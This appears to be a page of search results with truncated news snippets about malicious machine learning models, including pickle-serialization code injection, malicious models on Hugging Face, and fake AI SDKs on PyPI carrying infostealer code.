Researchers have concocted a new way of manipulating machine learning (ML) models by injecting malicious code into the process of serialization. The method focuses on the "pickling" process used to ...
Researchers at Reversing Labs have discovered two malicious machine learning (ML) models available on Hugging Face, the leading hub for sharing AI models and applications. While these models contain ...
Attackers are finding more and more ways to post malicious projects to Hugging Face and other repositories for open source artificial intelligence (AI) models, while dodging the sites' security checks ...
IT researchers have discovered malicious ML models on the Hugging Face AI development platform. Attackers could use them to infiltrate commands. IT researchers have discovered maliciously manipulated ...
Fake Alibaba Labs AI SDKs hosted on PyPI included PyTorch models with infostealer code inside. With support for detecting malicious code inside ML models lacking, expect the technique to spread.
Some results have been hidden because they may be inaccessible to you
Show inaccessible results